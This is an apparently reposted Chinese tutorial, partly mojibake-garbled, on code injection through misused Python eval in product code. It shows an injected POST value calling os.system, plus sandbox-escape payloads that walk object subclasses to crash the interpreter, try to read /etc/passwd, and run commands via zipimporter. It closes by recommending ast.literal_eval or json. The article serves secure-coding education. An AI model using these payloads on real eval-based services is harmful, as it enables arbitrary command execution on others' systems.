本篇文章給大家?guī)淼膬?nèi)容是關(guān)于Python eval的常見錯(cuò)誤封裝及利用原理的介紹，有一定的參考價(jià)值，有需要的朋友可以參考一下，希望對(duì)你有所幫助。

最近在代碼評(píng)審的過程，發(fā)現(xiàn)挺多錯(cuò)誤使用eval導(dǎo)致代碼注入的問題，比較典型的就是把eval當(dāng)解析dict使用，有的就是簡(jiǎn)單的使用eval，有的就是錯(cuò)誤的封裝了eval，供全產(chǎn)品使用，這引出的問題更嚴(yán)重，這些都是血淋淋的教訓(xùn)，大家使用的時(shí)候多加注意。

下面列舉一個(gè)實(shí)際產(chǎn)品中的例子，詳情見[bug83055][1]：

def remove(request, obj)：
     query = query2dict(request.POST)
     eval(query['oper_type'])(query, customer_obj)

而query就是POST直接轉(zhuǎn)換而來，是用戶可直接控制的，假如用戶在url參數(shù)中輸入 oper_type=__import__('os').system('sleep 5') 則可以執(zhí)行命令sleep，當(dāng)然也可以執(zhí)行任意系統(tǒng)命令或者任意可執(zhí)行代碼，危害是顯而易見的，那我們來看看eval到底是做什么的，以及如何做才安全？

1，做什么

簡(jiǎn)單來說就是執(zhí)行一段表達(dá)式

>>> eval('2+2')
4
>>> eval("""{'name':'xiaoming','ip':'10.10.10.10'}""")
{'ip': '10.10.10.10', 'name': 'xiaoming'}
>>> eval("__import__('os').system('uname')", {})
Linux
0

從這三段代碼來看，第一個(gè)很明顯做計(jì)算用，第二個(gè)把string類型數(shù)據(jù)轉(zhuǎn)換成python的數(shù)據(jù)類型，這里是dict，這也是咱們產(chǎn)品中常犯的錯(cuò)誤。第三個(gè)就是壞小子會(huì)這么干，執(zhí)行系統(tǒng)命令。

eval 可接受三個(gè)參數(shù)，eval(source[, globals[, locals]]) -> value

globals必須是路徑，locals則必須是鍵值對(duì)，默認(rèn)取系統(tǒng)globals和locals

2，不正確的封裝

（1）下面我們來看一段咱們某個(gè)產(chǎn)品代碼中的封裝函數(shù)，見[bug][2]，或者 網(wǎng)絡(luò)上搜索排名比較高的代碼 ，eg：

def safe_eval(eval_str):
    try:
        #加入命名空間
        safe_dict = {}
        safe_dict['True'] = True
        safe_dict['False'] = False
        return eval(eval_str,{'__builtins__':None},safe_dict)
    except Exception,e:
        traceback.print_exc()
        return ''

在這里 __builtins__ 置為空了，所以像 __import__ 這是內(nèi)置變量就沒有了，這個(gè)封裝函數(shù)就安全了嗎？下面我一步步道來：

>>> dir(__builtins__)
['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError', 'None', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', 'ReferenceError', 'RuntimeError', 'RuntimeWarning', 'StandardError', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError',

列表項(xiàng)

‘UnicodeEncodeError’, ‘UnicodeError’, ‘UnicodeTranslateError’, ‘UnicodeWarning’, ‘UserWarning’, ‘ValueError’, ‘Warning’, ‘ZeroDivisionError’, ‘_’, ‘ debug ‘, ‘ doc ‘, ‘ import ‘, ‘ name ‘, ‘ package ‘, ‘a(chǎn)bs’, ‘a(chǎn)ll’, ‘a(chǎn)ny’, ‘a(chǎn)pply’, ‘basestring’, ‘bin’, ‘bool’, ‘buffer’, ‘bytearray’, ‘bytes’, ‘callable’, ‘chr’, ‘classmethod’, ‘cmp’, ‘coerce’, ‘compile’, ‘complex’, ‘copyright’, ‘credits’, ‘delattr’, ‘dict’, ‘dir’, ‘divmod’, ‘enumerate’, ‘eval’, ‘execfile’, ‘exit’, ‘file’, ‘filter’, ‘float’, ‘format’, ‘frozenset’, ‘getattr’, ‘globals’, ‘hasattr’, ‘hash’, ‘help’, ‘hex’, ‘id’, ‘input’, ‘int’, ‘intern’, ‘isinstance’, ‘issubclass’, ‘iter’, ‘len’, ‘license’, ‘list’, ‘locals’, ‘long’, ‘map’, ‘max’, ‘memoryview’, ‘min’, ‘next’, ‘object’, ‘oct’, ‘open’, ‘ord’, ‘pow’, ‘print’, ‘property’, ‘quit’, ‘range’, ‘raw_input’, ‘reduce’, ‘reload’, ‘repr’, ‘reversed’, ‘round’, ‘set’, ‘setattr’, ‘slice’, ‘sorted’, ‘staticmethod’, ‘str’, ‘sum’, ‘super’, ‘tuple’, ‘type’, ‘unichr’, ‘unicode’, ‘vars’, ‘xrange’, ‘zip’]

從 __builtins__ 可以看到其模塊中有 __import__ ,可以借助用來執(zhí)行os的一些操作。如果置為空，再去執(zhí)行eval函數(shù)呢，結(jié)果如下：

>>> eval("__import__('os').system('uname')", {'__builtins__':{}})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 1, in <module>
NameError: name &#39;__import__&#39; is not defined

現(xiàn)在就是提示 __import__ 未定義，不能成功執(zhí)行了，看情況是安全了吧？答案當(dāng)然是錯(cuò)的。

比如執(zhí)行如下：

>>> s = """
... (lambda fc=(
...     lambda n: [
...         c for c in
...             ().__class__.__bases__[0].__subclasses__()
...             if c.__name__ == n
...         ][0]
...     ):
...     fc("function")(
...         fc("code")(
...             0,0,0,0,"test",(),(),(),"","",0,""
...         ),{}
...     )()
... )()
... """
>>> eval(s, {'__builtins__':{}})
Segmentation fault (core dumped)

在這里用戶定義了一段函數(shù)，這個(gè)函數(shù)調(diào)用，直接導(dǎo)致段錯(cuò)誤

下面這段代碼則是退出解釋器：

>>>
>>> s = """
... [
...     c for c in
...     ().__class__.__bases__[0].__subclasses__()
...     if c.__name__ == "Quitter"
... ][0](0)()
... """
>>> eval(s,{'__builtins__':{}})
liaoxinxi@RCM-RSAS-V6-Dev ~/tools/auto_judge $

初步理解一下整個(gè)過程：

>>> ().__class__.__bases__[0].__subclasses__()
[<type &#39;type&#39;>, <type &#39;weakref&#39;>, <type &#39;weakcallableproxy&#39;>, <type &#39;weakproxy&#39;>, <type &#39;int&#39;>, <type &#39;basestring&#39;>, <type &#39;bytearray&#39;>, <type &#39;list&#39;>, <type &#39;NoneType&#39;>, <type &#39;NotImplementedType&#39;>, <type &#39;traceback&#39;>, <type &#39;super&#39;>, <type &#39;xrange&#39;>, <type &#39;dict&#39;>, <type &#39;set&#39;>, <type &#39;slice&#39;>, <type &#39;staticmethod&#39;>, <type &#39;complex&#39;>, <type &#39;float&#39;>, <type &#39;buffer&#39;>, <type &#39;long&#39;>, <type &#39;frozenset&#39;>, <type &#39;property&#39;>, <type &#39;memoryview&#39;>, <type &#39;tuple&#39;>, <type &#39;enumerate&#39;>, <type &#39;reversed&#39;>, <type &#39;code&#39;>, <type &#39;frame&#39;>, <type &#39;builtin_function_or_method&#39;>, <type &#39;instancemethod&#39;>, <type &#39;function&#39;>, <type &#39;classobj&#39;>, <type &#39;dictproxy&#39;>, <type &#39;generator&#39;>, <type &#39;getset_descriptor&#39;>, <type &#39;wrapper_descriptor&#39;>, <type &#39;instance&#39;>, <type &#39;ellipsis&#39;>, <type &#39;member_descriptor&#39;>, <type &#39;file&#39;>, <type &#39;sys.long_info&#39;>, <type &#39;sys.float_info&#39;>, <type &#39;EncodingMap&#39;>, <type &#39;sys.version_info&#39;>, <type &#39;sys.flags&#39;>, <type &#39;exceptions.BaseException&#39;>, <type &#39;module&#39;>, <type &#39;imp.NullImporter&#39;>, <type &#39;zipimport.zipimporter&#39;>, <type &#39;posix.stat_result&#39;>, <type &#39;posix.statvfs_result&#39;>, <class &#39;warnings.WarningMessage&#39;>, <class &#39;warnings.catch_warnings&#39;>, <class &#39;_weakrefset._IterationGuard&#39;>, <class &#39;_weakrefset.WeakSet&#39;>, <class &#39;_abcoll.Hashable&#39;>, <type &#39;classmethod&#39;>, <class &#39;_abcoll.Iterable&#39;>, <class &#39;_abcoll.Sized&#39;>, <class &#39;_abcoll.Container&#39;>, <class &#39;_abcoll.Callable&#39;>, <class &#39;site._Printer&#39;>, <class &#39;site._Helper&#39;>, <type &#39;_sre.SRE_Pattern&#39;>, <type &#39;_sre.SRE_Match&#39;>, <type &#39;_sre.SRE_Scanner&#39;>, <class &#39;site.Quitter&#39;>, <class &#39;codecs.IncrementalEncoder&#39;>, <class &#39;codecs.IncrementalDecoder&#39;>, <type &#39;Struct&#39;>, <type &#39;cStringIO.StringO&#39;>, <type &#39;cStringIO.StringI&#39;>, <class &#39;configobj.InterpolationEngine&#39;>, <class &#39;configobj.SimpleVal&#39;>, <class &#39;configobj.InterpolationEngine&#39;>, <class &#39;configobj.SimpleVal&#39;>]

這句python代碼的意思就是找tuple的class，再找它的基類，也就是object，再通過object找他的子類，具體的子類也如代碼中的輸出一樣。從中可以看到了有file模塊，zipimporter模塊，是不是可以利用下呢？首先從file入手

假如用戶如果構(gòu)造：

>>> s1 = """
... [
...     c for c in
...     ().__class__.__bases__[0].__subclasses__()
...     if c.__name__ == "file"
... ][0]("/etc/passwd").read()()
... """
>>> eval(s1,{'__builtins__':{}})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 6, in <module>
IOError: file() constructor not accessible in restricted mode

這個(gè)restrictected mode簡(jiǎn)單理解就是python解釋器的沙盒，一些功能被限制了，比如說不能修改系統(tǒng)，不能使用一些系統(tǒng)函數(shù)，如file，詳情見 Restricted Execution Mode ，那怎么去繞過呢？這時(shí)我們就想到了zipimporter了，假如引入的模塊中引用了os模塊，我們就可以像如下代碼來利用。

>>> s2="""
... [x for x in ().__class__.__bases__[0].__subclasses__()
...    if x.__name__ == "zipimporter"][0](
...      "/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module(
...      "configobj").os.system("uname")
... """
>>> eval(s2,{'__builtins__':{}})
Linux
0

這就驗(yàn)證了剛才的safe_eval其實(shí)是不安全的。

3，如何正確使用

（1）使用ast.literal_eval

（2）如果僅僅是將字符轉(zhuǎn)為dict，可以使用json格式

本篇文章到這里就已經(jīng)全部結(jié)束了，更多其他精彩內(nèi)容可以關(guān)注PHP中文網(wǎng)的python視頻教程欄目！

以上是Python eval的常見錯(cuò)誤封裝及利用原理的介紹的詳細(xì)內(nèi)容。更多信息請(qǐng)關(guān)注PHP中文網(wǎng)其他相關(guān)文章！